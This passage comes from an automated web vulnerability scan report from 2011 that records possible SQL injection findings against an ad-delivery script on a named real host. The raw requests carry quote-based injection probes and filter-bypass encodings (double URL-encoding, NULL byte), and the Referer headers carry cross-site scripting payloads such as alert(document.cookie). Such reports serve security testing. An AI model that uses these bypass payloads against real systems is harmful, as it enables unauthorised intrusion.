Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:59 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=kWeqQ-wJhd4; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:30:59 GMT
Set-Cookie: GEO=cd292126a2309f40972ca5321f4112a7cwsAAAAzVVOtwdbzTUsQgw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.24. http://www8.tucows.com/delivery/afr.php [OAVARS[aed03704] cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www8.tucows.com
Path:	/delivery/afr.php

Issue detail

The OAVARS[aed03704] cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the OAVARS[aed03704] cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the OAVARS[aed03704] cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:46:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:46:15 GMT; path=/
Set-Cookie: OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22726%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3778

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
our system with the leading and award-winning Registry Booster 2011 from Uniblue. Registry Booster 2011 is the safest and most trusted solution to clean and optimize your system, free it from registry errors and fragmented entries.
Through Advanced Error Detection Technology, Registry Booster 2011 automatically identifies missing, corrupt, or invalid items in your Windows registry and dramatically enhances performance and general stability
</p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:46:16 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:46:16 GMT; path=/
Set-Cookie: OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3965

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

1.25. http://www8.tucows.com/delivery/afr.php [n parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www8.tucows.com
Path:	/delivery/afr.php

Issue detail

Request 1

GET /delivery/afr.php?n=aed03704'&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:48 GMT; path=/
Set-Cookie: OAVARS[aed03704\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%221445%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3808

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.

<p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704''&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:49 GMT; path=/
Set-Cookie: OAVARS[aed03704\'\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3965

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

1.26. http://www8.tucows.com/delivery/afr.php [n parameter] previous

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www8.tucows.com
Path:	/delivery/afr.php

Issue detail

The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /delivery/afr.php?n=aed03704%00'&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:38 GMT; path=/
Set-Cookie: OAVARS[aed03704\0\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%221445%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3794

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.

<p>
...[SNIP]...

Request 2

GET /delivery/afr.php?n=aed03704%00''&zoneid=124&cb=d302be2a HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:39 GMT; path=/
Set-Cookie: OAVARS[aed03704\0\'\']=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3951

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:41:36 CST 2011.